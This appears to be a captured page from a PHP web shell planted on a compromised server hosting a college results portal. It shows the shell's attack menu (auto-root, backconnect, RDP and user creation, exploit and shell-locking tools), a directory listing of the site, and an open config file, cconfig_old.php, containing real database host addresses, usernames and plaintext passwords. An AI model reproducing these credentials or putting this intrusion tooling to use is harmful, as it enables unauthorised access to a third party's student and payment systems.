Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.223.108.134
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
kusdde /
[ HOME SHELL ]
Name
Size
Permission
Action
Excel_Writer
[ DIR ]
drwxr-xr-x
Excel_reader
[ DIR ]
drwxr-xr-x
JQGrid3.5
[ DIR ]
drwxr-xr-x
Report_details
[ DIR ]
drwxr-xr-x
adm
[ DIR ]
drwxr-xr-x
adm2018
[ DIR ]
drwxr-xr-x
adm_old
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
custom_js
[ DIR ]
drwxr-xr-x
custom_src
[ DIR ]
drwxr-xr-x
easy_zip
[ DIR ]
drwxr-xr-x
grid_display_files
[ DIR ]
drwxr-xr-x
halltickets
[ DIR ]
drwxrwxrwx
html_modules
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
imported_files
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
maya-pdf
[ DIR ]
drwxr-xr-x
misc_files
[ DIR ]
drwxrwxrwx
rev
[ DIR ]
drwxr-xr-x
schema
[ DIR ]
drwxr-xr-x
src_stop
[ DIR ]
drwxr-xr-x
student_photos
[ DIR ]
drwxrwxrwx
tarka_pdf
[ DIR ]
drwxr-xr-x
tarka_pdf_latest
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
tmpphotos
[ DIR ]
drwxrwxrwx
user_images
[ DIR ]
drwxr-xr-x
validation_files
[ DIR ]
drwxr-xr-x
.htaccess
602
B
-rwxr-xr-x
MainPage.html
12.31
KB
-rwxr-xr-x
MainPagepopup.html
7.05
KB
-rwxr-xr-x
TAGMAY2013.pdf
331.03
KB
-rwxr-xr-x
app.php
416
B
-rwxr-xr-x
cconfig.php
899
B
-rwxr-xr-x
cconfig_old.php
1.13
KB
-rwxr-xr-x
cnvo_paytm.php
1.33
KB
-rwxr-xr-x
collegeInfoPopup.html
3.76
KB
-rwxr-xr-x
favicon.ico
1.12
KB
-rwxr-xr-x
getQPdet.php
6.74
KB
-rw-rw-r--
homepage.html
3.35
KB
-rwxr-xr-x
index.php
83
B
-rwxr-xr-x
index_new_portal.php
83
B
-rwxr-xr-x
index_stop.html
5.81
KB
-rwxr-xr-x
index_wait.html
20.82
KB
-rwxr-xr-x
indexlatest.html
5.16
KB
-rwxr-xr-x
indexlogin_stop.html
5.96
KB
-rwxr-xr-x
indexold.html
5.19
KB
-rwxr-xr-x
kusstr.sql
16
KB
-rwxr-xr-x
logo.jpg
29.02
KB
-rwxr-xr-x
mainpage.htm
31.7
KB
-rwxr-xr-x
oasis_manual.pdf
1.2
MB
-rwxr-xr-x
paytm_res.php
4.24
KB
-rwxr-xr-x
rv report format.doc
30
KB
-rwxr-xr-x
rv_update.php
1.78
KB
-rwxr-xr-x
serv_paytm.php
1.27
KB
-rwxr-xr-x
valdet.php
12.04
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cconfig_old.php
<?php define("APP_NAME_G","development"); define("APP_LANDPAGE_G","app.php"); define("APP_PATH_G", dirname($_SERVER["SCRIPT_FILENAME"])); define("APP_SRC_G", APP_PATH_G . "/src"); define("APP_LIB_G", APP_PATH_G . "/libs"); define("APP_DB_G", APP_LIB_G . "/adodb5"); define("INR_NAME_PICFORMAT", "xx,xx,xx,xxx.xx"); //define("APP_HOST", "http://10.10.200.172/activity/"); //define("APP_HOST", "http://localhost/activity/"); class CConfig { public $mstr_host; public $mstr_user; public $mstr_password; public $mstr_db; public $mbool_debug; function __construct($abool_debug = false) { $this->mstr_host = "72.167.46.92"; #hostname can include port as well $this->mstr_user = "kusduser"; $this->mstr_password = "kusd159"; $this->mstr_db = "resultsg_kusd"; $this->mbool_debug = $abool_debug; ini_set("magic_quotes_gpc", 0); /* $this->mstr_host = "localhost"; #hostname can include port as well $this->mstr_user = "resultsg_tarka"; $this->mstr_password = "tarka123"; $this->mstr_db = "resultsg_rcu"; $this->mbool_debug = $abool_debug; ini_set("magic_quotes_gpc", 0); */ } } ?>
Close